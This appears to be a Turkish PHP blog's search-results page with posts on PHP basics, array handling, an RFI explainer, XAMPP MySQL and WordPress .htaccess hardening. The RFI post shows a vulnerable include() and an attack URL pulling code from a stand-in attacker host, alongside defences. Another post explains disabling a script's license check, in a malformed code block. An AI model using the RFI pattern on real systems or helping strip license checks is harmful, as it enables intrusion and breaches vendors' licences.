Home / php sorgusuna yönelik arama sonuçları
php sorgusu için yayınlar alaka düzeyine göre sıralanmış olarak gösteriliyor. Tarihe göre sırala Tüm yayınları göster
php sorgusu için yayınlar alaka düzeyine göre sıralanmış olarak gösteriliyor. Tarihe göre sırala Tüm yayınları göster

24 Mart 2023 Cuma

Php Nedir Kullanim Amaclari Nelerdir

 merhaba webyazilimciniz okuyuculari bugun sizlere php konusunu anlatacam html ve css konualarını makelemızden okuyabılırsınız php neler yapılır php nedır kullanım amaclarını sızlere anlatacam oncelıkle php nedır nerelerde kullanır php sıtekı onemı nedir bunları anlatacam baslayalım;

Php Nedir


PHP, kişisel home page (PHP) olarak başlayan, ancak daha sonra "Hypertext Preprocessor" olarak adlandırılan bir sunucu taraflı, betik tabanlı bir programlama dilidir. PHP, web geliştirme alanında oldukça yaygın olarak kullanılan ve özellikle dinamik web siteleri oluşturmak için tercih edilen bir dildir.

PHP, HTML içerisine gömülerek kullanılabilen, sunucu taraflı bir dildir. Yani, bir web tarayıcısı üzerinde çalışan bir PHP dosyası, sunucuda işlenir ve ardından tarayıcıya HTML olarak gönderilir. Bu sayede, web sayfaları dinamik hale getirilebilir, veritabanıyla etkileşim sağlanabilir ve kullanıcı girdileri işlenebilir.

PHP'nin kullanım amaçları şunlardır:

  1. Web Geliştirme: PHP, web siteleri ve uygulamaları geliştirmek için yaygın olarak kullanılan bir dil olarak öne çıkar. Veritabanı bağlantıları, form işleme, kullanıcı kimlik doğrulama, dosya işlemleri gibi birçok web geliştirme görevini kolaylıkla yerine getirebilir.

  2. Sunucu Tarafı Programlama: PHP, sunucu taraflı programlama için kullanılan bir dildir. Sunucuda işlenen bir PHP dosyası, dinamik içerik üretmek veya belirli işlemleri gerçekleştirmek için kullanılabilir. Örneğin, bir kullanıcının giriş yaptığı verileri işlemek ve sonuçları sunmak gibi.

  3. Veritabanı İşlemleri: PHP, veritabanı ile etkileşim sağlamak için kullanılır. Veritabanı bağlantıları oluşturabilir, sorgular gönderebilir, veri ekleyebilir, güncelleyebilir ve silebilir. Bu sayede dinamik web siteleri oluşturulabilir ve verilerin saklanması ve yönetimi sağlanabilir.

  4. Form İşleme: PHP, web formu verilerini işlemek için sıkça kullanılır. Kullanıcıların web formuna girdiği verileri alabilir, doğrulayabilir ve işleyebilir. Örneğin, bir kullanıcının kayıt formunu doldurduğunda, PHP bu verileri alıp veritabanına kaydedebilir veya başka bir işlem gerçekleştirebilir.

  5. Dosya İşlemleri: PHP, sunucuda dosya oluşturma, okuma, yazma, silme gibi işlemleri gerçekleştirmek için kullanılabilir. Örneğin, kullanıcıların dosya yükleme işlemlerini yönetmek için PHP kullanılabilir.


Yorum

16 Ocak 2025 Perşembe

function.php Lisans Kaldirma

 


PHP'de bir diziden belirli bir öğeyi kaldırmak veya bir listeyi düzenlemek için birkaç yöntem kullanabilirsiniz. İşte bir öğeyi kaldırmanın en yaygın yollarından bazıları:

1. unset() Fonksiyonunu Kullanarak

unset() fonksiyonu, belirli bir dizin veya anahtarı tamamen kaldırır.

php
<?php
$array = ["elma", "armut", "muz", "kiraz"];
unset($array[2]); // "muz" kaldırılır
print_r($array);
?>

Çıktı:

csharp
Array
(
    [0] => elma
    [1] => armut
    [3] => kiraz
)

Not: Dizideki anahtar korunur, ancak değeri kaldırılır. Diziyi yeniden sıralamak isterseniz array_values() kullanabilirsiniz.

2. array_diff() ile Belirli Bir Değeri Kaldırma

Bir değeri listeyle karşılaştırarak kaldırmak için array_diff() kullanılabilir.

php
<?php
$array = ["elma", "armut", "muz", "kiraz"];
$array = array_diff($array, ["muz"]); // "muz" kaldırılır
print_r($array);
?>

Çıktı:

csharp
Array
(
    [0] => elma
    [1] => armut
    [3] => kiraz
)

3. array_filter() Kullanarak

Bir değeri kaldırmak için bir filtreleme işlemi uygulayabilirsiniz.

php
<?php
$array = ["elma", "armut", "muz", "kiraz"];
$array = array_filter($array, function($value) {
    return $value !== "muz"; // "muz" kaldırılır
});
print_r($array);
?>

Çıktı:

csharp
Array
(
    [0] => elma
    [1] => armut
    [3] => kiraz
)

4. Bir Anahtarı veya İndeksi Kaldırdıktan Sonra Yeniden Sıralama

Anahtarı kaldırdıktan sonra diziyi yeniden sıralamak için array_values() kullanabilirsiniz.

php
<?php
$array = ["elma", "armut", "muz", "kiraz"];
unset($array[2]); // "muz" kaldırılır
$array = array_values($array); // Anahtarlar yeniden sıralanır
print_r($array);
?>

Çıktı:

csharp
Array
(
    [0] => elma
    [1] => armut
    [2] => kiraz
)

-------------------------------------------------------------------------
Scprit Lisansi Kaldirma

tüm scriptlerin genelde function.php deki lisansta site adını yazıp da hala lisans hatası alan arkadaşların yapması gereken tek işlem:

<?php
if( substr($_SERVER["HTTP_HOST"], 0, 4) == "www." )
{
    $www = "www.";
    $domainadi = $_SERVER["HTTP_HOST"];
}
else
{
    $www = "";
    $domainadi = $_SERVER["HTTP_HOST"];
}

$site = $www . "localhost";
if( $domainadi !== $site ) YAPILACAK TEK İŞLEM ! İŞARETİNİ KALDIRMAK
{
    echo "Lisansız Kullanım Tespit Edildi.";
}

Yorum

5 Ocak 2025 Pazar

Remote File Inclusion Nedir ?


Remote File Inclusion (RFI), Türkçesiyle Uzaktan Dosya Dahil Etme, bir web uygulamasının dış kaynaklardan (genellikle saldırganın kontrol ettiği bir sunucudan) dosya çağırmasına veya yüklemesine olanak tanıyan bir güvenlik açığıdır. Bu tür açıklar, genellikle web uygulamalarının kullanıcı girdilerini yetersiz şekilde doğrulaması nedeniyle ortaya çıkar.

RFI genellikle PHP tabanlı web uygulamalarında, özellikle de include, require, include_once ve require_once gibi fonksiyonların kullanıldığı durumlarda görülür. Eğer bu fonksiyonlara dinamik olarak bir dosya yolu atanır ve bu girdi doğrulanmazsa, saldırganlar dış kaynaklardan kötü amaçlı dosyalar dahil edebilir.

RFI Saldırısının İşleyişi

  1. Hedef Açığı Bulma: Saldırgan, dosya dahil etmek için kullanılan parametrelerin bulunduğu bir zayıf noktayı tespit eder. Örneğin:

    php
    <?php
include($_GET['page']);
?>

    Bu kod, ?page= parametresi ile dinamik olarak bir dosya dahil etmektedir.

  2. Kötü Amaçlı URL Sağlama: Saldırgan, kötü amaçlı bir dosyanın bulunduğu URL'yi parametre olarak verir:

    bash
    http://hedefsite.com/index.php?page=http://saldirgan.com/malicious.php

  3. Kötü Amaçlı Kodun Çalıştırılması: Uygulama, saldırganın sunduğu uzaktaki dosyayı çağırır ve içeriğini çalıştırır. Bu dosya genellikle:

    • Yetkisiz erişim sağlar,
    • Veritabanı bilgilerini çalar,
    • Sistem üzerinde zararlı komutlar çalıştırır,
    • Sunucuya bir arka kapı (backdoor) bırakır.

RFI Saldırısının Tehlikeleri

  • Yetkisiz Erişim: Saldırgan, sunucuda istediği dosyaları okuma ve yazma yetkisi kazanabilir.
  • Sistem Ele Geçirme: Zararlı kodlar ile sunucu tamamen ele geçirilebilir.
  • Veri Hırsızlığı: Kullanıcı verileri, veritabanı bilgileri gibi hassas bilgiler çalınabilir.
  • DDoS ve Spam: Sunucu, saldırılar için bir botnet'e dönüştürülebilir.

Korunma Yöntemleri

  1. Kullanıcı Girdisini Doğrulama:

    • Dinamik dosya çağrısı gerekiyorsa, kullanıcı girdisi beyaz listeye göre doğrulanmalıdır.
    • Mutlaka sabit bir yol ile sınırlı kalınmalı:
      php
      $whitelist = ['home.php', 'about.php'];
if (in_array($_GET['page'], $whitelist)) {
    include($_GET['page']);
} else {
    echo "Geçersiz sayfa.";
}

  2. allow_url_include Ayarını Kapatma:

    • PHP'deki allow_url_include ve allow_url_fopen direktifleri kapalı olmalıdır:
      ini
      allow_url_include = Off
allow_url_fopen = Off

  3. Dosya Dahil Etme Yolunu Sınırlama:

    • Dinamik dosya çağrılarında dış kaynaklardan dosya çağrılmasına izin verilmemeli.
    • Mutlaka yerel dosya yolları kullanılmalı.

  4. Web Uygulama Güvenlik Duvarı (WAF):

    • Güvenlik duvarları, RFI saldırılarını tespit edip engelleyebilir.

  5. Kod Gözden Geçirme ve Güvenlik Testleri:

    • Web uygulaması kodları düzenli olarak incelenmeli.
    • Penetrasyon testleri ile açıklar tespit edilmelidir.


 

Yorum

8 Nisan 2025 Salı

XAMPP MysqL Nedir ?


XAMPP'ın bir parçası olan MySQL, web geliştirme için kullanılan popüler bir ilişkisel veritabanı yönetim sistemidir (RDBMS). İşte XAMPP MySQL'in ne olduğu ve nasıl kullanıldığına dair temel bilgiler:

XAMPP Nedir?

XAMPP, web geliştirme için gerekli olan çeşitli yazılımları tek bir pakette toplayan ücretsiz ve açık kaynaklı bir dağıtımdır. "X" harfi çapraz platform anlamına gelirken, diğer harfler şu bileşenleri temsil eder:

Apache: Web sunucusu
MySQL (veya MariaDB): Veritabanı yönetim sistemi
PHP: Sunucu taraflı betik dili
Perl: Bir başka betik dili
XAMPP, geliştiricilerin web uygulamalarını yerel bilgisayarlarında (localhost) geliştirmelerine ve test etmelerine olanak tanır.

MySQL Nedir?

MySQL, yapılandırılmış veriyi tablolarda saklamak, yönetmek ve sorgulamak için kullanılan bir RDBMS'dir. Web uygulamaları için veri depolama, kullanıcı yönetimi, içerik yönetimi gibi birçok alanda kritik bir rol oynar.

XAMPP İçinde MySQL'in Rolü

XAMPP, MySQL veritabanı sunucusunu kolayca kurup çalıştırmanıza olanak tanır. Bu sayede:

Web uygulamalarınız için bir veritabanı ortamı oluşturabilirsiniz.
PHP gibi sunucu taraflı diller aracılığıyla bu veritabanına bağlanıp veri okuma, yazma, güncelleme ve silme işlemleri yapabilirsiniz.
WordPress, Joomla, Drupal gibi popüler içerik yönetim sistemlerini (CMS) yerelinizde çalıştırabilirsiniz, çünkü bu sistemler veri depolamak için MySQL'e ihtiyaç duyarlar.
XAMPP MySQL'in Özellikleri

Kolay Kurulum: XAMPP'ın bir parçası olarak geldiği için ayrı bir kurulum gerektirmez.
Entegrasyon: Apache ve PHP ile sorunsuz bir şekilde çalışır.
phpMyAdmin: Veritabanlarını web tabanlı bir arayüz üzerinden yönetmek için phpMyAdmin aracıyla birlikte gelir. Bu araç sayesinde veritabanı oluşturma, tablo düzenleme, SQL sorguları çalıştırma gibi işlemleri kolayca yapabilirsiniz.
Açık Kaynak: Ücretsizdir ve geniş bir topluluk desteğine sahiptir.
Çoklu Platform Desteği: Windows, Linux ve macOS gibi farklı işletim sistemlerinde çalışabilir.
Güvenilirlik ve Performans: Web uygulamaları için güvenilir ve yeterli performans sunar (geliştirme ve test ortamları için).
XAMPP MySQL Nasıl Kullanılır?

XAMPP Kontrol Panelini Açın: XAMPP kurulum dizininde bulunan xampp-control.exe (Windows), xampp (Linux) veya XAMPP uygulamasını (macOS) çalıştırın.
MySQL Modülünü Başlatın: Kontrol panelinde "MySQL" satırının yanındaki "Start" düğmesine tıklayarak MySQL sunucusunu başlatın. Başarılı bir şekilde başlatıldığında bu satır yeşil renkte görünecektir.
phpMyAdmin'e Erişin: Kontrol panelinde "MySQL" satırının yanındaki "Admin" düğmesine tıklayarak veya bir web tarayıcısında http://localhost/phpmyadmin/ adresini ziyaret ederek phpMyAdmin arayüzüne ulaşabilirsiniz.
Veritabanı Oluşturma: phpMyAdmin arayüzünde "Veritabanları" (Databases) sekmesine tıklayın. "Yeni veritabanı oluştur" (Create new database) bölümüne istediğiniz veritabanı adını yazın ve "Oluştur" (Create) düğmesine tıklayın.
Tablo Oluşturma: Oluşturduğunuz veritabanını seçtikten sonra, "Yeni tablo oluştur" (Create new table) bölümüne tablo adını ve sütun sayısını girerek "Git" (Go) düğmesine tıklayın. Açılan sayfada sütun adlarını, veri tiplerini ve diğer özelliklerini belirleyebilirsiniz.
Veri Yönetimi: Tablolarınızı oluşturduktan sonra "Gözat" (Browse), "Ekle" (Insert), "SQL" gibi sekmeleri kullanarak veri ekleyebilir, silebilir, düzenleyebilir ve SQL sorguları çalıştırabilirsiniz.
PHP ile Bağlantı Kurma: PHP kodunuzda mysqli veya PDO gibi eklentileri kullanarak MySQL veritabanına bağlanabilir ve veri alışverişi yapabilirsiniz. Bağlantı bilgileri genellikle sunucu adı (localhost), kullanıcı adı (root - varsayılan), parola (varsayılan olarak boştur) ve veritabanı adını içerir.


 

Yorum

24 Mart 2025 Pazartesi

Wordpress Htaccess Güvenlik Sağlama

WordPress sitenizin güvenliğini artırmak için .htaccess dosyasını kullanmak, etkili bir yöntemdir. İşte .htaccess dosyasını kullanarak WordPress güvenliğini sağlamak için bazı adımlar:

1. .htaccess Dosyasını Yedekleyin:

  • Herhangi bir değişiklik yapmadan önce, .htaccess dosyanızın bir yedeğini alın. Bu, herhangi bir sorun durumunda dosyayı geri yüklemenizi sağlar.

2. Hassas Dosyalara Erişimi Kısıtlayın:

  • wp-config.php gibi hassas dosyalara doğrudan erişimi engellemek için aşağıdaki kodları .htaccess dosyanıza ekleyin:
Apache
<files wp-config.php>
order allow,deny
deny from all
</files>
  • Bu kod, wp-config.php dosyasına dışarıdan erişimi tamamen engeller.

3. Dizin Listelemeyi Devre Dışı Bırakın:

  • Dizin listeleme, kötü niyetli kişilerin sitenizdeki dosya ve klasör yapısını görmesine olanak tanır. Bunu engellemek için aşağıdaki kodu ekleyin:
Apache
Options -Indexes

4. .htaccess Dosyasına Erişimi Kısıtlayın:

  • .htaccess dosyasına yetkisiz erişimi engellemek için aşağıdaki kodları ekleyin:
Apache
<files .htaccess>
order allow,deny
deny from all
</files>

5. XML-RPC Saldırılarını Engelleme:

  • XML-RPC, WordPress'e uzaktan erişim sağlayan bir özelliktir ve saldırılara açık olabilir. Bunu engellemek için aşağıdaki kodu ekleyin:
Apache
<files xmlrpc.php>
order allow,deny
deny from all
</files>

6. Belirli IP Adreslerine Erişimi İzin Verin:

  • Sadece belirli IP adreslerinin sitenize erişmesini istiyorsanız, aşağıdaki kodu kullanabilirsiniz:
Apache
order deny,allow
deny from all
allow from IP_ADRESİNİZ
  • IP_ADRESİNİZ yerine, izin vermek istediğiniz IP adresini yazın.

7. Güvenlik Eklentileri Kullanın:

  • .htaccess dosyası ile yapılan güvenlik önlemleri tek başına yeterli olmayabilir. Bu sebeple, Wordfence Security, All In One WP Security & Firewall gibi güvenlik eklentilerini kullanmak sitenizin güvenliğini arttıracaktır.

Önemli Notlar:

  • .htaccess dosyasında yapılan hatalı değişiklikler, sitenizin çalışmamasına neden olabilir. Bu nedenle, değişiklikleri yapmadan önce dikkatli olun ve yedek almayı unutmayın.
  • .htaccess dosyası sunucu taraflı bir konfigürasyon dosyasıdır ve sunucunuzun Apache kullanması gerekmektedir.
  • Bu kodların bazıları sunucu konfigürasyonunuza göre değişiklik gösterebilir.

 

Yorum

Wordpress Admin Panel Yolu Değiştirme




 WordPress yönetici panelinin (wp-admin) yolunu değiştirmek, web sitenizin güvenliğini artırmanın etkili bir yoludur. Varsayılan giriş adresini değiştirerek, kötü niyetli kişilerin giriş denemelerini zorlaştırabilirsiniz. İşte bu işlemi gerçekleştirmenin farklı yöntemleri:

1. Eklenti Kullanarak (Önerilen Yöntem):

  • WPS Hide Login:
    • En popüler ve kullanıcı dostu eklentilerden biridir.
    • WordPress eklenti dizininden kolayca kurulabilir.
    • Ayarlar sayfasından yeni giriş adresinizi belirleyebilirsiniz.
    • Örneğin, "giris" veya "ozelgiris" gibi bir adres belirleyebilirsiniz.
  • Diğer Eklentiler:
    • "Rename wp-login.php" gibi benzer işlevlere sahip başka eklentiler de mevcuttur.

Eklenti Kullanmanın Avantajları:

  • Kolay ve hızlı kurulum.
  • Teknik bilgi gerektirmez.
  • Geri alma işlemi basittir.

2. .htaccess Dosyası ile (İleri Düzey):

  • Bu yöntem, sunucu dosyalarına doğrudan erişim gerektirir.
  • .htaccess dosyasında yapılacak hatalar, web sitenizin erişilemez hale gelmesine neden olabilir.
  • Bu sebeple eklenti kullanmak her zaman daha kolay ve güvenlidir.
  • Bu yöntemi kullanmak için .htaccess dosyasına aşağıdaki gibi kodlar eklenmelidir.
    • Bu kodlar wp-admin ve wp-login.php dosyalarının yerini değiştirir.
    • Bu yöntem, güvenlik eklentileri ile birlikte kullanılmamalıdır.
  • Kod örneği:
    • RewriteRule ^yenigiris$ /wp-login.php [L,QSA]
    • Burada "yenigiris" kısmını istediğiniz gibi değiştirebilirsiniz.

.htaccess Dosyası ile Değiştirmenin Dezavantajları:

  • Teknik bilgi gerektirir.
  • Hatalı düzenleme, web sitesine zarar verebilir.
  • Sunucu değişikliklerinden etkilenebilir.

Önemli Notlar:

  • Yeni giriş adresinizi güvenli bir yerde saklayın.
  • Güçlü bir kullanıcı adı ve parola kullanın.
  • WordPress ve eklentilerinizi güncel tutun.
  • Güvenlik eklentileri kullanın.
  • Düzenli olarak web sitenizin yedeğini alın.
Yorum
Kaydol: Kayıtlar (Atom)